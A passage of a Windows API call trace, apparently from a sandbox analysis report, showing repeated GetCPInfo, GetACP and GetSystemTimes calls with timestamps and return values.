GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.129] GetACP () returned 0x4e4 [0083.129] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.129] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.129] GetACP () returned 0x4e4 [0083.129] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.129] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.129] GetACP () returned 0x4e4 [0083.129] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.130] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.130] GetACP () returned 0x4e4 [0083.130] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.130] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.130] GetACP () returned 0x4e4 [0083.130] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.130] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.130] GetACP () returned 0x4e4 [0083.130] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.130] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.130] GetACP () returned 0x4e4 [0083.130] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.130] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.130] GetACP () returned 0x4e4 [0083.130] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.131] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.131] GetACP () returned 0x4e4 [0083.131] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.131] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.131] GetACP () returned 0x4e4 [0083.131] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.131] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.131] GetACP () returned 0x4e4 [0083.131] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.131] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.131] GetACP () returned 0x4e4 [0083.131] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.132] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.132] GetACP () returned 0x4e4 [0083.132] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.132] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.132] GetACP () returned 0x4e4 [0083.132] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.132] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.132] GetACP () returned 0x4e4 [0083.132] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.132] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.132] GetACP () returned 0x4e4 [0083.132] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.132] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.132] GetACP () returned 0x4e4 [0083.133] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.133] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.133] GetACP () returned 0x4e4 [0083.133] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.133] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.133] GetACP () returned 0x4e4 [0083.133] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.133] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.133] GetACP () returned 0x4e4 [0083.133] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.133] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.133] GetACP () returned 0x4e4 [0083.133] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.133] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.133] GetACP () returned 0x4e4 [0083.133] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.134] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.134] GetACP () returned 0x4e4 [0083.134] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.134] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.134] GetACP () returned 0x4e4 [0083.134] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.134] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.134] GetACP () returned 0x4e4 [0083.134] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.134] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.134] GetACP () returned 0x4e4 [0083.134] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.135] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.135] GetACP () returned 0x4e4 [0083.135] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.135] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.135] GetACP () returned 0x4e4 [0083.135] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.135] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.135] GetACP () returned 0x4e4 [0083.135] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.135] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.135] GetACP () returned 0x4e4 [0083.135] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.136] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.136] GetACP () returned 0x4e4 [0083.136] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.136] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.136] GetACP () returned 0x4e4 [0083.136] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.136] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.136] GetACP () returned 0x4e4 [0083.136] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.136] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.136] GetACP () returned 0x4e4 [0083.137] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.137] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.137] GetACP () returned 0x4e4 [0083.137] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.137] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.137] GetACP () returned 0x4e4 [0083.137] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.137] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.137] GetACP () returned 0x4e4 [0083.137] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.137] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.137] GetACP () returned 0x4e4 [0083.137] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.137] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.138] GetACP () returned 0x4e4 [0083.138] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.138] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.138] GetACP () returned 0x4e4 [0083.138] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.138] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.138] GetACP () returned 0x4e4 [0083.138] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.138] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.138] GetACP () returned 0x4e4 [0083.138] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.139] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.139] GetACP () returned 0x4e4 [0083.139] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.139] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.139] GetACP () returned 0x4e4 [0083.139] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.139] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.139] GetACP () returned 0x4e4 [0083.139] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.139] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.139] GetACP () returned 0x4e4 [0083.139] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.140] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.140] GetACP () returned 0x4e4 [0083.140] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.140] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.140] GetACP () returned 0x4e4 [0083.140] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.140] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.140] GetACP () returned 0x4e4 [0083.141] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.141] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.141] GetACP () returned 0x4e4 [0083.141] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.141] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.141] GetACP () returned 0x4e4 [0083.141] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.141] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.141] GetACP () returned 0x4e4 [0083.141] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.141] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.141] GetACP () returned 0x4e4 [0083.142] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.142] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.142] GetACP () returned 0x4e4 [0083.142] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.142] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.142] GetACP () returned 0x4e4 [0083.142] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.142] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.142] GetACP () returned 0x4e4 [0083.142] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.142] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.142] GetACP () returned 0x4e4 [0083.142] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.143] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.143] GetACP () returned 0x4e4 [0083.143] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.143] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.143] GetACP () returned 0x4e4 [0083.143] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.143] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.143] GetACP () returned 0x4e4 [0083.143] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.143] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.143] GetACP () returned 0x4e4 [0083.143] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.144] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.144] GetACP () returned 0x4e4 [0083.144] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.144] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.144] GetACP () returned 0x4e4 [0083.144] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.144] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.144] GetACP () returned 0x4e4 [0083.144] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.144] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.144] GetACP () returned 0x4e4 [0083.144] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.144] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.144] GetACP () returned 0x4e4 [0083.144] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.144] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.145] GetACP () returned 0x4e4 [0083.145] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.145] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.145] GetACP () returned 0x4e4 [0083.145] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.145] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.145] GetACP () returned 0x4e4 [0083.145] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.145] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.145] GetACP () returned 0x4e4 [0083.145] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.145] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.145] GetACP () returned 0x4e4 [0083.145] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.146] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.146] GetACP () returned 0x4e4 [0083.146] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.146] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.146] GetACP () returned 0x4e4 [0083.146] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.146] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.146] GetACP () returned 0x4e4 [0083.146] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.146] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.146] GetACP () returned 0x4e4 [0083.146] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.146] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.146] GetACP () returned 0x4e4 [0083.147] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0083.147] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0083.147] GetACP () returned 0x4e4 [0083.147] GetSystemTimes (in: 